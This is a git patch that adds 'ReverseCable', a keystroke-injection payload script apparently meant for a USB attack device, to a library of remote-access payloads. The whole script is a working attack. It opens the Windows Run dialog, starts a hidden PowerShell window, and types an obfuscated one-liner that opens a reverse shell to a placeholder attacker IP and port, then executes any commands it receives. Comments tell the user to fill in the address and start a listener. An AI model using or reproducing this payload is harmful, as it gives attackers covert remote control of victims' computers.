From 33e39faafa286265346eafbff0edce9ccc77ce3c Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Mon, 27 Dec 2021 16:02:27 +0100 Subject: [PATCH] Uploaded ReverseCable Reverse shell, based on the ReverseDuckyII script. Plug in your reverse shell <3 --- .../remote_access/ReverseCable/payload.txt | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 payloads/library/remote_access/ReverseCable/payload.txt diff --git a/payloads/library/remote_access/ReverseCable/payload.txt b/payloads/library/remote_access/ReverseCable/payload.txt new file mode 100644 index 0000000..d5a1953 --- /dev/null +++ b/payloads/library/remote_access/ReverseCable/payload.txt @@ -0,0 +1,26 @@ +REM ReverseCable +REM Version 1.0 +REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) +REM Author: 0iphor13 + +REM Reverse shell, based on ReverseDuckyII, executed in the background +REM Fill in Attacker-IP and Port in Line 19 +REM DON'T FORGET TO START LISTENER + +DELAY 500 +DUCKY_LANG de +DELAY 1500 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -W hidden +DELAY 250 +ENTER + +DELAY 200 +STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("ATTACKER-IP",PORT);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$ +DELAY 100 +STRING s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oU +DELAY 100 +STRING t-STriNG);$x=$z+"O.MG@PS "+(pwd)+">";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE() +DELAY 100 +ENTER